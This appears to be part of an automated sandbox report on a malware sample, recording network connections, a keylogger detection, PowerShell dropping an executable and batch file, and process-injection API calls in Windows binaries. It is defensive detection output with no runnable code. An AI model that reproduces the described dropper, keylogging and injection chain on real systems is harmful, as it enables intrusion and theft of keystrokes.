Source: unknown Network traffic detected: HTTP traffic on port 55996 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53335 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52225 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52219
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53309
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52217
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52218
Source: unknown Network traffic detected: HTTP traffic on port 53621 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52211
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53543
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55722
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52212
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54631
Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52451
Source: unknown Network traffic detected: HTTP traffic on port 52193 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52210
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52452
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52215
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55960
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52216
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52213
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55720
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52214
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53544
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54633
Source: unknown Network traffic detected: HTTP traffic on port 52400 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52148 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55905 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52228
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52229
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53699 -> 443
Source: unknown HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.7:49776 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.69.42.241:443 -> 192.168.2.7:52142 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.7:52152 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.7:52166 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.7:52174 version: TLS 1.2
Creates a DirectInput object (often for capturing keystrokes)
Source: regsvr32.exe, 00000007.00000003.1501970483.000000001C9A0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: DirectInput8Create memstr_46571554-c
Installs a raw input device (often for capturing keystrokes)
Source: regsvr32.exe, 00000007.00000003.1501970483.000000001C9A0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: GetRawInputData memstr_cc88e3cb-2
Yara detected Keylogger Generic
Source: Yara match File source: 7.3.regsvr32.exe.1c9a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.OpenWith.exe.1bd877d5168.87.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.OpenWith.exe.1bd87b10000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.OpenWith.exe.1bd87830000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.regsvr32.exe.1c6c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.OpenWith.exe.1bd87b10000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.OpenWith.exe.1bd87830000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.regsvr32.exe.1c9a0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.1512321032.000001BD87B10000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1511290183.000001BD87830000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1500890614.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1501970483.000000001C9A0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 1316, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: OpenWith.exe PID: 6960, type: MEMORYSTR

System Summary
barindex
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Desktop\utox_x86_x64.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\ajbs50ul.bat Jump to dropped file
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\utox_x86_x64.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E947000 NtWriteFile,WaitForSingleObject, 3_2_00007FF79E947000
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E946EE0 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError, 3_2_00007FF79E946EE0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_1C0C56A8 NtQuerySystemInformation,NtQuerySystemInformation,lstrcmpiW,CloseHandle,free, 7_2_1C0C56A8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_1C0C51B4 NtQueryInformationProcess, 7_2_1C0C51B4
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_3_00007DF423EB1CE8 calloc,CreateProcessW,NtResumeThread,CloseHandle,free, 14_3_00007DF423EB1CE8
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_3_00007DF423EB1958 calloc,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtQueryInformationProcess,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory, 14_3_00007DF423EB1958
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6D27B8 NtAcceptConnectPort, 14_2_00000203FE6D27B8
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6D288C NtAcceptConnectPort, 14_2_00000203FE6D288C
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6D28E8 NtAcceptConnectPort, 14_2_00000203FE6D28E8
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6D28B8 NtAcceptConnectPort, 14_2_00000203FE6D28B8
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6D2990 NtAcceptConnectPort, 14_2_00000203FE6D2990
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6D2418 NtAcceptConnectPort, 14_2_00000203FE6D2418
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6D2C64 NtAcceptConnectPort, 14_2_00000203FE6D2C64
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6D252C NtAcceptConnectPort, 14_2_00000203FE6D252C
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6D29D4 NtAcceptConnectPort, 14_2_00000203FE6D29D4
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00007DF423EB1E64 CreateProcessW,NtResumeThread,CloseHandle, 14_2_00007DF423EB1E64
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00007DF423EB199C calloc,NtQueryInformationProcess,NtReadVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory, 14_2_00007DF423EB199C
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00007DF423EC2704 NtQuerySystemInformation,free,malloc,NtQuerySystemInformation, 14_2_00007DF423EC2704
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF1385C NtQuerySystemInformation, 15_2_000002913DF1385C
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5A288C NtAcceptConnectPort, 16_2_00000260AF5A288C
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5A2688 NtAcceptConnectPort, 16_2_00000260AF5A2688
Contains functionality to communicate with device drivers
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E946190: memcpy,DeviceIoControl,CloseHandle,CloseHandle,GetLastError, 3_2_00007FF79E946190
Detected potential crypto function
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E94B630 3_2_00007FF79E94B630
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9494D0 3_2_00007FF79E9494D0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E8F2FE9 3_2_00007FF79E8F2FE9
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E942E70 3_2_00007FF79E942E70
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E923FB7 3_2_00007FF79E923FB7
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9A7FA0 3_2_00007FF79E9A7FA0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E97FFF0 3_2_00007FF79E97FFF0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E99BF20 3_2_00007FF79E99BF20
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E8FFF83 3_2_00007FF79E8FFF83
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9A40C0 3_2_00007FF79E9A40C0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E98A0E0 3_2_00007FF79E98A0E0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E982030 3_2_00007FF79E982030
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E923DD0 3_2_00007FF79E923DD0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E97FE00 3_2_00007FF79E97FE00
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E969E0B 3_2_00007FF79E969E0B
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E99BDE0 3_2_00007FF79E99BDE0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E93FF10 3_2_00007FF79E93FF10
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E97DEF0 3_2_00007FF79E97DEF0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E999BC0 3_2_00007FF79E999BC0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E98DBE0 3_2_00007FF79E98DBE0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E963B40 3_2_00007FF79E963B40
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E909B30 3_2_00007FF79E909B30
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E925CC0 3_2_00007FF79E925CC0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E93DD00 3_2_00007FF79E93DD00
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9A5CE0 3_2_00007FF79E9A5CE0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E90DC80 3_2_00007FF79E90DC80
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E97B9B0 3_2_00007FF79E97B9B0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E979920 3_2_00007FF79E979920
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E95F960 3_2_00007FF79E95F960
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9A7AC0 3_2_00007FF79E9A7AC0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E953AA0 3_2_00007FF79E953AA0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E995B00 3_2_00007FF79E995B00
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E921B00 3_2_00007FF79E921B00
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E8F1A31 3_2_00007FF79E8F1A31
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E951A40 3_2_00007FF79E951A40
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E93DA50 3_2_00007FF79E93DA50
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E90BA80 3_2_00007FF79E90BA80
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E96B7FD 3_2_00007FF79E96B7FD
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E91B800 3_2_00007FF79E91B800
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E8FF7E0 3_2_00007FF79E8FF7E0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E989750 3_2_00007FF79E989750
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E99B720 3_2_00007FF79E99B720
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E98F730 3_2_00007FF79E98F730
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E991780 3_2_00007FF79E991780
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E957770 3_2_00007FF79E957770
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9618A0 3_2_00007FF79E9618A0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E97F840 3_2_00007FF79E97F840
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E96D887 3_2_00007FF79E96D887
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9695B6 3_2_00007FF79E9695B6
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9215E0 3_2_00007FF79E9215E0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9A15DD 3_2_00007FF79E9A15DD
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9375F0 3_2_00007FF79E9375F0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E97F5F0 3_2_00007FF79E97F5F0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E92D520 3_2_00007FF79E92D520
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E997530 3_2_00007FF79E997530
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E97D6A8 3_2_00007FF79E97D6A8
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E901665 3_2_00007FF79E901665
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E8F565B 3_2_00007FF79E8F565B
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E96D671 3_2_00007FF79E96D671
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9A5410 3_2_00007FF79E9A5410
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E993350 3_2_00007FF79E993350
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E90B350 3_2_00007FF79E90B350
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9A7330 3_2_00007FF79E9A7330
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9634B6 3_2_00007FF79E9634B6
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E97F440 3_2_00007FF79E97F440
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E90D1D0 3_2_00007FF79E90D1D0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E91B200 3_2_00007FF79E91B200
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E98D160 3_2_00007FF79E98D160
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E947170 3_2_00007FF79E947170
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E913290 3_2_00007FF79E913290
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E97CFCB 3_2_00007FF79E97CFCB
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E95D0A0 3_2_00007FF79E95D0A0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E97F0A0 3_2_00007FF79E97F0A0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E90F030 3_2_00007FF79E90F030
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E92F060 3_2_00007FF79E92F060
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E8FEDB4 3_2_00007FF79E8FEDB4
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E99ADE0 3_2_00007FF79E99ADE0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E920D80 3_2_00007FF79E920D80
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E938C00 3_2_00007FF79E938C00
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E994BF0 3_2_00007FF79E994BF0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E932B80 3_2_00007FF79E932B80
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E968CAC 3_2_00007FF79E968CAC
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E95ED00 3_2_00007FF79E95ED00
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E990CE0 3_2_00007FF79E990CE0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E998CF0 3_2_00007FF79E998CF0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E90AC30 3_2_00007FF79E90AC30
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E99EC60 3_2_00007FF79E99EC60
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E982920 3_2_00007FF79E982920
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E974920 3_2_00007FF79E974920
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E96A990 3_2_00007FF79E96A990
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E934AC0 3_2_00007FF79E934AC0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E992B00 3_2_00007FF79E992B00
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E978A20 3_2_00007FF79E978A20
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9627A4 3_2_00007FF79E9627A4
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9047CD 3_2_00007FF79E9047CD
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E92A740 3_2_00007FF79E92A740
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E994750 3_2_00007FF79E994750
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E910820 3_2_00007FF79E910820
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E90C860 3_2_00007FF79E90C860
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E930870 3_2_00007FF79E930870
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E988520 3_2_00007FF79E988520
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E924579 3_2_00007FF79E924579
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9906A0 3_2_00007FF79E9906A0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E996710 3_2_00007FF79E996710
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9026E2 3_2_00007FF79E9026E2
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9503A0 3_2_00007FF79E9503A0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E97C356 3_2_00007FF79E97C356
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E97C358 3_2_00007FF79E97C358
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E98E4C0 3_2_00007FF79E98E4C0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E90A4A0 3_2_00007FF79E90A4A0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E90446C 3_2_00007FF79E90446C
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9841B0 3_2_00007FF79E9841B0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E99C1F0 3_2_00007FF79E99C1F0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E96C120 3_2_00007FF79E96C120
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E91E180 3_2_00007FF79E91E180
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E90C170 3_2_00007FF79E90C170
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E99A2A0 3_2_00007FF79E99A2A0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9382A0 3_2_00007FF79E9382A0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E96E23A 3_2_00007FF79E96E23A
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E8FE28F 3_2_00007FF79E8FE28F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFAAC454DFA 4_2_00007FFAAC454DFA
Source: C:\Windows\System32\regsvr32.exe Code function: 7_3_02F318D7 7_3_02F318D7
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F318D7 7_2_02F318D7
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F308A4 7_2_02F308A4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F30837 7_2_02F30837
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_1C0C4A54 7_2_1C0C4A54
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_1C0C870C 7_2_1C0C870C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_1C0C710C 7_2_1C0C710C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_1C0C1500 7_2_1C0C1500
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_1C0C2F00 7_2_1C0C2F00
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_1C0C8A58 7_2_1C0C8A58
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_1C0C5BC0 7_2_1C0C5BC0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_1C0C3CEC 7_2_1C0C3CEC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_1C0C9FFC 7_2_1C0C9FFC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00007FFAAC44098D 7_2_00007FFAAC44098D
Source: C:\Windows\System32\OpenWith.exe Code function: 11_3_000001BD87841150 11_3_000001BD87841150
Source: C:\Windows\System32\OpenWith.exe Code function: 11_3_000001BD85340967 11_3_000001BD85340967
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_3_00007DF423EB392C 14_3_00007DF423EB392C
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_3_00007DF423EB2204 14_3_00007DF423EB2204
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_3_00007DF423EB4EFC 14_3_00007DF423EB4EFC
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6C2628 14_2_00000203FE6C2628
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6D2D24 14_2_00000203FE6D2D24
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6CC25C 14_2_00000203FE6CC25C
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6DD010 14_2_00000203FE6DD010
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6FA81C 14_2_00000203FE6FA81C
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6E7094 14_2_00000203FE6E7094
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE700874 14_2_00000203FE700874
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6ED854 14_2_00000203FE6ED854
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6F5918 14_2_00000203FE6F5918
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6F48D0 14_2_00000203FE6F48D0
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6FE984 14_2_00000203FE6FE984
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6E0174 14_2_00000203FE6E0174
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6FF940 14_2_00000203FE6FF940
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6DF618 14_2_00000203FE6DF618
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6F4DE8 14_2_00000203FE6F4DE8
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6F95D4 14_2_00000203FE6F95D4
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6F55B0 14_2_00000203FE6F55B0
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6E7684 14_2_00000203FE6E7684
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6F5EC8 14_2_00000203FE6F5EC8
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6E3EA4 14_2_00000203FE6E3EA4
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6DBEB8 14_2_00000203FE6DBEB8
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6E86B4 14_2_00000203FE6E86B4
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6F3F70 14_2_00000203FE6F3F70
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6DC750 14_2_00000203FE6DC750
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6D6F24 14_2_00000203FE6D6F24
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6FCC00 14_2_00000203FE6FCC00
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6F0478 14_2_00000203FE6F0478
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE706434 14_2_00000203FE706434
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6E6D18 14_2_00000203FE6E6D18
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6DDCE4 14_2_00000203FE6DDCE4
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6FECE4 14_2_00000203FE6FECE4
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6C14D0 14_2_00000203FE6C14D0
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE700D90 14_2_00000203FE700D90
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6FF1D0 14_2_00000203FE6FF1D0
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6D7270 14_2_00000203FE6D7270
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE700270 14_2_00000203FE700270
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6F4A50 14_2_00000203FE6F4A50
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE703A4D 14_2_00000203FE703A4D
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6F3A38 14_2_00000203FE6F3A38
